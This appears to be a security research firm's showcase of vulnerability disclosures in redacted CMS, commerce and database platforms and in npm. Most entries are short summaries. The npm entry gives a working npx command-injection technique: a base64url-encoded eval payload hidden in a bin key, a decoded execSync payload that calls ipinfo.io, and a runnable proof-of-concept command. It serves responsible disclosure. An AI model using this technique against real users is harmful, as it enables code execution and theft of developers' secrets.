Showcase

The Ghost Security Research team has discovered and disclosed a number of vulnerabilities using Ghost Security Agent Skills.

Recent research

GSR-2026-03-004

• Project: [redacted] community platform
• Vulnerability: BOLA (4 instances)
• Status: Maintainers notified privately; disclosure pending

The Ghost Research Team discovered four broken object level authorization vulnerabilities in the [redacted] community platform. The application's authorization policies for several admin controllers delegate instance-level checks to collection-level checks, verifying only that the requesting user belongs to any organization — not that they have access to the specific record. An authenticated attacker with access to one organization can read PII and modify records belonging to any other organization in the system.

Additional details to follow, pending disclosure timeline.

GSR-2026-03-003

• Project: [redacted] CMS platform
• Vulnerability: SQL Injection
• Status: Maintainers notified privately; disclosure pending

The Ghost Research Team discovered a SQL injection vulnerability in the [redacted] CMS platform. A user-supplied sort parameter from the query string is parsed and interpolated directly into a raw SQL ORDER BY clause with no allowlist or escaping. An unauthenticated attacker can inject arbitrary SQL subqueries through any public page that uses the affected helper, enabling data exfiltration from the database.

Additional details to follow, pending disclosure timeline.

GSR-2026-03-002

• Project: [redacted] CMS platform
• Vulnerability: Command Injection
• Status: Maintainers notified privately; disclosure pending

The Ghost Research Team discovered a command injection vulnerability in the [redacted] CMS platform. The application evaluates a user-supplied expression for custom webhook verification, protected by a keyword blacklist. The blacklist fails to account for an alternative language-level syntax for shell execution, allowing an attacker to execute arbitrary OS commands on the server. The exploit requires no authentication — a single HTTP POST to a webhook endpoint triggers the payload, and command output is returned in the response body.

Additional details to follow, pending disclosure timeline.

GSR-2026-03-001

• Project: [redacted] operations platform
• Vulnerability: BOLA (2 instances)
• Status: Maintainers notified privately; disclosure pending

The Ghost Research Team discovered two broken object level authorization vulnerabilities in the [redacted] operations platform. When performing a DELETE operation on a resource with a query parameter specifying a destination, the application verifies access on the source object being deleted but fails to validate ownership of the destination. A restricted user can exploit this to move resources into another tenant's scope, bypassing tenant isolation.

Additional details to follow, pending disclosure timeline.

GSR-2026-02-007

• Project [redacted] CMS platform
• Vulnerability: Stored XSS/Credential Exfiltration
• Status: Maintainers notified privately; patch pending

The Ghost Research Team discovered a stored cross-site scripting (XSS) vulnerability in the [redacted] CMS platform. A process that ingests social media content fails to sanitize certain fields and persists that to the database. When an admin views the content, the UI renders/executes the stored javascript. The exploit payload provided demonstrated a silent admin API token exfiltration via img url which provides the attacker with Admin access to the CMS platform.

Additional details to follow, pending disclosure timeline.

GSR-2026-02-006

• Project: [redacted] database
• Vulnerability: Auth Session Expiry
• Status: Maintainers notified privately; disclosure pending

The Ghost Research Team discovered a authentication expiration time vulnerability in the [redacted] database. The issue allows for JWT tokens to survive past a 15 minutes expiration timeout despite a specific setting that expires them after 15 minutes.

Additional details to follow, pending disclosure timeline.

GSR-2026-02-005

• Project: [redacted] vulnerability management platform
• Vulnerability: BOLA
• Status: Maintainers notified privately; patch pending

The Ghost Research Team discovered a broken object level authorization vulnerability in the [redacted] vulnerability management platform. The vulnerability allows any authenticated user with a read-only role to trigger an update on a resource that integrates with an external system.

Additional details to follow, pending disclosure timeline.

GSR-2026-02-004

• Project: [redacted] vulnerability management platform
• Vulnerability: BOLA
• Status: Maintainers notified privately; disclosure pending

The Ghost Research Team discovered a broken object level authorization vulnerability in the [redacted] vulnerability management platform. The issue allows for a scoped resource containing sensitive data to be read by all users in the global scope.

Additional details to follow, pending disclosure timeline.

GSR-2026-02-003

• Project: NPM package manager
• Vulnerability: Command injection
• Status: Maintainers notified privately; classified as not a security risk

The Ghost Research Team discovered a command injection vulnerability in the NPM package manager. The vulnerability allows an attacker to execute arbitrary code on the system running the package manager to execute dynamic run packages via the npx command, potentially exfiltrating sensitive data or leading to system compromise.

Vulnerability

A malicious package author can set bin key names in package.json containing POSIX shell metacharacters. The bin key is name of a command provided by the package while the value is expected to be the command itself. When a victim runs npx <package>, the bin key is extracted from the fetched manifest, wrapped in double quotes, and passed to sh -c. Double quotes do not prevent $() command substitution in POSIX sh. The escape.sh() function that properly single-quotes values is applied to arguments only — but not to the command name (the bin key).

The consent prompt displays only the package name and version. The malicious bin key name is never shown to the user.

Reproduction

# From any directory:
npx @ghostsecurity/npx-bin-key-poc

# After the command exits:
ls -la npx-poc-pwned
# If this file exists, command injection occurred.

What happens

1. npx fetches the manifest for @ghostsecurity/npx-bin-key-poc
2. Consent prompt shows: "Need to install: @ghostsecurity/npx-bin-key-poc@0.0.2"
3. User approves (the bin key name is not visible to the user)
4. getBinFromManifest() returns the bin key containing $(node -e "eval(...)")
5. run-script.js wraps it in double quotes (which don't prevent $() expansion)
6. promise-spawn builds: sh -c '"$(node -e "eval(...)")"'
7. Shell evaluates $() — Node decodes and executes the base64url payload:
   • touch npx-poc-pwned — creates marker file in cwd
   • curl -s ipinfo.io — fetches victim's public IP info (or anything else the attacker wants to run)
   • writes response to stderr — displayed on victim's terminal (optionally, could be suppressed)

The injected commands have already executed at step 7.

Payload technique

Bin key names are normalized by normalizePackageBin() which runs path.basename() (strips /) and secureAndUnixifyPath() (replaces \ and : with /). This means the bin key cannot contain /, \, or :.

To bypass this, the payload is encoded as JavaScript, base64url-encoded (alphabet A-Za-z0-9-_ — no forbidden characters), and decoded at runtime via node -e "eval(Buffer.from('...','base64url').toString())". Since npx requires Node.js, node is always available. This allows arbitrary commands including complex URLs with paths and query parameters.

The decoded JavaScript:

const e = require("child_process").execSync;
e("touch npx-poc-pwned");
process.stderr.write(e("curl -s ipinfo.io"));
process.stderr.write("\n");

Affected code path

• libnpmexec/lib/get-bin-from-manifest.js:7 — returns Object.keys(bin)[0] without validation
• libnpmexec/lib/run-script.js:22 — args[0] = '"' + args[0] + '"' (double quotes, not single)
• @npmcli/promise-spawn/lib/index.js:78,118-121 — escape.sh() applied to args, not command name

Impact

Arbitrary command execution as the victim user. An attacker publishes a package to any npm registry. The victim runs npx <package> and approves the install prompt (which reveals nothing suspicious). The injected commands run with the victim's full privileges.

A real attacker could exfiltrate environment variables, tokens, SSH keys, or install persistent backdoors — all triggered by a single npx invocation.

Variants: $(), backtick `...`, and double-quote breakout "$(...)" all work.

GSR-2026-02-002

• Project: [redacted] commerce platform
• Vulnerability: TOCTOU
• Status: Maintainers notified privately; disclosure pending

The Ghost Research Team discovered a time of check to time of use vulnerability in the [redacted] commerce platform. The vulnerability allows an attacker to exploit race condition in the order checkout process to tamper with multiple order attributes, potentially leading to fraudulent orders.

Additional details to follow, pending disclosure timeline.

GSR-2026-02-001

• Project: [redacted] commerce platform
• Vulnerability: TOCTOU
• Status: Maintainers notified privately; disclosure pending

The Ghost Research Team discovered a broken object level authorization vulnerability in the [redacted] commerce platform. The vulnerability allows an attacker to redeem gift card balances multiple times, potentially leading to financial loss.

Additional details to follow, pending disclosure timeline.